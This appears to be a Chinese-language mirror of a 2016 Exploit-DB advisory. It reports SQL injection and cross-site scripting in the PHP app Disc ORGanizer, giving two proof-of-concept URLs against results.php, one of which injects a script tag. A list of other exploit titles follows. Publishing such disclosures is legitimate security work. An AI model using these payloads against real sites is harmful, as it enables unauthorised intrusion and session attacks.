Disc ORGanizer (DORG) – Multiple Vulnerabilities

Exploit Database
37 阅读

作者： SECUPENT

日期： 2016-03-21
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/39580/

Exploit Title:DORG - Disc Organization System SQL Injection And Cross Site Scripting 
Software Link: http://www.opensourcecms.com/scripts/details.php?scriptid=479
Author: SECUPENT 
Website:www.secupent.com
Email: research{at}secupent{dot}com
Date: 20-3-2016


SQL Injection: 

link: http://localhost/dorg/results.php?q=3&search=%2527&type=3

Screenshot: http://secupent.com/exploit/images/drogsql.jpg

Cross Site Scripting (XSS):

link: http://localhost/dorg/results.php?q=%27%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%3CscRipt%3Ealert%280x00194A%29%3C%2fscRipt%3E&search=Search&type=3

Screenshot: http://secupent.com/exploit/images/drogxss.jpg

last Exploits
Disc ORGanizer (DORG) – Multiple Vulnerabilities的更多信息

Aanval 7.1 build 70151 – Multiple Vulnerabilities：
RW-Download 4.0.6 – ‘index.php’ SQL Injection：
Joomla! Component com_shop – ‘id’ SQL Injection：
Device42 WAN Emulator 2.3 – Ping Command Injection (Metasploit)：
Schools Alert Management Script – Authentication Bypass：
MyClassifiedScript 5.1 – SQL Injection：
OSClass 2.3.x – Directory Traversal / Arbitrary File Upload：
Joomla! Component com_alfurqan15x – SQL Injection：